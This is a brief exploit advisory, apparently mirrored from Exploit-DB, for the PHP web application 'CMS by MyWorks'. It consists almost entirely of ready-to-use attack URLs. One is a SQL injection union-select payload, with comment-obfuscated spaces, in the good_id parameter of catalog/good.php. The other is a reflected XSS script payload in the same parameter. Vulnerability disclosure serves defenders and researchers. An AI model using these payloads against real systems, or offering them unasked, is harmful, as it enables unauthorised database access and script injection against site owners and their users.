CMS by MyWorks – Multiple Vulnerabilities - 体验盒子

作者： Palyo34

日期： 2010-03-01

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11610/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

CMS by MyWorks SQL/ XSS Vulnerability

========================================================

####################################################################

# Author : Palyo34

# Home : www.1923Turk.com

# Script : CMS by MyWorks

# Script site: http://www.myworks.spb.ru/

####################################################################

===[ Exploit ]===

http://server/catalog/good.php?good_id= SQL INJECTION

1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12

Demo:

http://server/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12

###################################################################

===[XSS Vulnerability]===

http://server/catalog/good.php?good_id=

http://server/catalog/good.php?good_id=164<script>alert("XSS")</script>